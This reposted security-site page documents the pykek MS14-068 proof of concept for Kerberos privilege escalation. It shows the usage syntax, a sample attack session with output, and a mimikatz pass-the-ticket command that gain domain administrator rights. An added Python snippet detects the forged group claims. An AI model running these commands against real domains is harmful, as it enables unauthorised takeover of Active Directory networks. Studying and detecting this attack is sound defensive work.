MS14-068 privilege escalation PoC: lets any domain user escalate to domain administrator

admin 2021-04-02 20:28:05

ms14-068.py

Exploits the MS14-068 vulnerability on an unpatched domain controller of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups:

Domain Users (513)

Domain Admins (512)

Schema Admins (518)

Enterprise Admins (519)

Group Policy Creator Owners (520)

USAGE:

    ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControllerAddr>

OPTIONS:

    -p
    --rc4

Example usage:

Linux (tested with samba and MIT Kerberos) 

root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
 Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Creating ccache file '[email protected]'... Done! 
root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc [email protected]" exit

from: https://github.com/bidord/pykek
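
A defender-side check for the group list above, added here as an example (it is not pykek code): compare the privileged group SIDs a logon claims with what the directory actually grants the account. The record layout, the 1104 account and all function names are constructed for illustration, and a single-domain forest is assumed.

```python
# Added example (not pykek code): compare the privileged groups a logon claims
# with what the directory grants. Record layout and the 1104 account are constructed.
DOMAIN = "S-1-5-21-557603841-771695929-1514560438"  # domain SID from the page's example

# RIDs the page lists; 513 (Domain Users) is left out because every user holds it.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins",
                   519: "Enterprise Admins", 520: "Group Policy Creator Owners"}

def split_sid(sid):
    """Split 'S-1-5-21-a-b-c-RID' into (domain SID, RID)."""
    parts = sid.strip().upper().split("-")
    if len(parts) < 5 or parts[0] != "S" or not all(p.isdigit() for p in parts[1:]):
        raise ValueError("malformed SID: %r" % (sid,))
    return "-".join(parts[:-1]), int(parts[-1])

def unearned_groups(user_sid, claimed_sids, granted_rids):
    """Privileged groups claimed for user_sid that the directory does not grant."""
    domain, _ = split_sid(user_sid)
    unearned = set()
    for sid in claimed_sids:
        try:
            group_domain, rid = split_sid(sid)
        except ValueError:
            continue  # skip short well-known SIDs such as S-1-1-0
        # Assumes a single-domain forest, so all four groups share the user's domain SID.
        if group_domain == domain and rid in PRIVILEGED_RIDS and rid not in granted_rids:
            unearned.add(PRIVILEGED_RIDS[rid])
    return sorted(unearned)

def triage(logons, directory):
    """Map each user SID to its unearned groups; unknown accounts have nothing granted."""
    flagged = {}
    for user_sid, claimed in logons:
        extra = unearned_groups(user_sid, claimed, directory.get(user_sid, set()))
        if extra:
            flagged[user_sid] = extra
    return flagged

# Constructed sample: 1103 is an ordinary user, 1104 a real Domain Admin.
DIRECTORY = {DOMAIN + "-1103": {513}, DOMAIN + "-1104": {512, 513}}
LOGONS = [
    (DOMAIN + "-1103", [DOMAIN + "-%d" % r for r in (513, 512, 518, 519, 520)] + ["S-1-1-0"]),
    (DOMAIN + "-1104", [DOMAIN + "-512", DOMAIN + "-513", "S-1-5-32-544"]),
]

if __name__ == "__main__":
    for sid, groups in triage(LOGONS, DIRECTORY).items():
        print(sid, "claims", ", ".join(groups))
```
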

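Comments (old system):

0.0 @ 2014-12-07 21:48:55

核总, every so often I can't access your site while I'm browsing it. I suspect my IP got banned. Is it because I viewed too much content in a short time? 0.0

Site reply:

Uh, maybe~

Article source: lcx.cc: MS14-068 privilege escalation PoC: lets any domain user escalate to domain administrator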

admin
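  • This article was published on 2021-04-02 20:28:05
  • When reposting, please keep this article's link (CN-SEC中文网: thanks to the original author for the hard work):
                   MS14-068 privilege escalation PoC: lets any domain user escalate to domain administrator http://cn-sec.com/archives/317434.html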
